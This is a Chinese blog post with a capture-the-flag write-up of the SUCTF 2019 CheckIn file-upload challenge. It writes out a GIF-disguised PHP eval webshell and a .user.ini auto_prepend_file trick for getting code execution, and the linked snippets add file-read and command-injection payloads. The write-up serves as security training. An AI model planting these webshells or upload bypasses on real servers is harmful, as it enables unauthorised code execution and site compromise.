第二十三题——[SUCTF 2019]CheckIn

最新推荐文章于 2022-03-08 23:40:12 发布
最新推荐文章于 2022-03-08 23:40:12 发布
阅读量200 收藏 1
点赞数
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/115721334
版权
题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,一个提交框,猜测上传一句话木马获取shell

在这里插入图片描述

第二步:上传伪装过的pass.phtml,发现被拦截

在这里插入图片描述

第三步:上传正常的png文件发现提示:index.php

在这里插入图片描述

第四步:上传一句话木马图片格式,使用.user.ini让index.php文件加载一句话木马,以获取shell

  1. 上传一句话木马图片:GIF89a? <script language="php">eval($_REQUEST[pass])</script>
    在这里插入图片描述

  2. 上传.user.ini文件:GIF89a auto_prepend_file=pass.png
    在这里插入图片描述

  3. 使用蚁剑连接index.php获取flag。注意此处连接地址为:buuoj.cn/uploads/d99081fe929b750e0557f85e6499103f/index.php,上传文件提示的存放地
    在这里插入图片描述

知识点

exif_imagetype
(PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8)
exif_imagetype — 判断一个图像的类型
说明
exif_imagetype ( string $filename ) : int
exif_imagetype() 读取一个图像的第一个字节并检查其签名。

想学习安全的小白
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SUCTF web CheckIn
weixin_42499640的博客
08-19 2702
记录一道SUCTFweb1 据菠萝师傅说这是他们出的签到 我tcl
[SUCTF 2019]CheckIn
热门推荐
沐目的博客
10-22 1万+
一、知识点 1.1exif_imagetype() 打开发现是上传,发现可以上传jpg等格式的文件。然后上传txt格式的文件,发现后台好像是通过exif_imagetype函数判断的— 判断一个图像的类型。 <?php if (exif_imagetype("image.gif") != IMAGETYPE_GIF) { echo "The picture is not a gif"...
SUCTF2019 CheckIn
segogt的博客
11-28 647
对文件后缀的黑名单匹配 通过上传配置文件.user.ini绕过 .user.ini auto_prepend_file:指定的文件能够在主文件执行前自动被解析。 auto_append_file:指定的文件的内容在主文件执行后自动被解析 如果php脚本使用了exit()中断退出,auto_append_file就不会被执行 于是可以通过上传.user.ini,然后再上传一个指定的文件,文件...
1-4 【实验】04-phtml绕过+代码审计
山兔的博客
03-08 3078
我们现在开始讲upload,pass-03的目,首先,我们直接选一个php文件上传 我们点上传,看看它的提示 它提示我们不能够上传.asp,.aspx,.php,.jsp后缀文件,这些文件都是我们常用的web后缀名,它居然不能够上传这些后缀名,那我们要采取其他的办法进行绕过 现在我们是php的环境,那我们能够用php4、php5,或者说是phtml的方式进行绕过,那当然,如果说我们是asp的环境,那我们可以用asa、cer、cdx,这样的后缀名,进行绕过,那如果说是我们aspx的,这种网站,我们能够用
checkin
03-18
【标】:“checkin”项目解析 【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,...
glados_checkin
03-25
glados定时签到
checkin-system
05-19
2.克隆gsshop-checkin $ git clone https://github.com/GSSHOPLabs/gsshop-checkin.git $ cd gsshop-checkin $ npm install 3.启动gsshop-checkin $ node ./bin/www 4.开始开发 http://localhost:3000 5.捕获...
checkin-ncku
05-21
checkin-nckuFeature打卡完截屏并寄到信箱每天随机打卡依据上班时间,在合法时间内进行随机下班打卡依据假期日,跳过打卡日期Install yarn installUsage填入所需的帐户资讯到credential.json cp credential-template...
SUCTF_2019_部分复现
Lethe's Blog
09-01 5101
Web1 CheckIn 1、进入目后是一个简单的上传页面: 先尝试上传普通的图片马,发现会显示<? in contents!,过滤了<?,可以使用<script language='php'></scrip>绕过。 修改后再次上传发现显示exif_imagetype:not image!,还用了exif_imagetype()进行检验,可以加上GIF89a...
SUCTF 2019 CheckIn 作有感
qq_46184013的博客
04-15 619
一.SUCTF 2019 CheckIn 刚开始打开这道以为只是一道普通的文件上传, 先是试了试php一句话木马,提示 这里显示 是对<?进行过滤了 这时候想到可以换一种方法,用 <script language='php'>system('cat /flag');</script>对<?进行替换。 但发现还是不行,出现这个界面。 我是小白也不懂这个啊,去...
第1-63总结:URL提交参数获取flag篇
分享简单的安全技术
05-10 3775
第一种:使用目录穿越方法,提交参数时输入:xxxx?/…/…/…/…/flag,利用?/将xxx文件失效,解析到flag所在文档,eg:第一 第二种:使用filter协议读取文件,语句:php://filter/read=convert.base64-encode/resource=flag.php 第三种:执行ping命令时,使用|或;执行除ping命令外我们想要执行的命令 空格替换:采用$IPS$1代替空格 关键字替换,cat /flag=a=g;cat$IFS$1fla$a 第四种:利用空格绕过WA
第五十八——[极客大挑战 2019]FinalSQL
分享简单的安全技术
05-08 777
目地址:https://buuoj.cn/challenges 解思路 第一步:进入目,看到sql测试框,以及1,2,3,4,5超链接 第二步:测试漏洞点 点击1超链接后出现NO! Not this! Click others~~~字样,在URL地址栏添加^2后发现注入点 第三步:获取flag 由于^一般适用于盲注猜测ASCII码值,所以这里使用盲注获取flag 手动测试回显字样:输入http://d9cc6ff9-ac2f-4193-985d-dce132ad08bd.node3.buuoj.
第六十一——[MRCTF2020]Ezpop
分享简单的安全技术
05-08 688
目地址:https://buuoj.cn/challenges 解思路 第一步:进入目,显示出源码 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack
第五十四——[WUSTCTF2020]朴实无华
分享简单的安全技术
04-29 674
目地址:https://buuoj.cn/challenges 解思路 第一步:进入目,访问/robots.txt文件看到提示/fAke_f1agggg.php 第二步:访问/fAke_f1agggg.php,看到提示:/fl4g.php 第三步:访问/fl4g.php看到源码 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level
第四十二——[安洵杯 2019]easy_web
分享简单的安全技术
04-26 633
目地址:https://buuoj.cn/challenges 解思路 第一步:进入目,没有任何提示,但是看到URL中的img参数有点问 第二步:将img参数进行解密 先对其使用base64解密得到:MzUzNTM1MmU3MDZlNjc=,看着还有点像base64 再对其进行base64解密,得到:3535352e706e67,看着像hex编码 使用hex对其解码得到:555.png 按f12发现img标签后面的元素有一场,对其base64解码得到乱码,从乱码中猜测这个可能是555.png的内
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值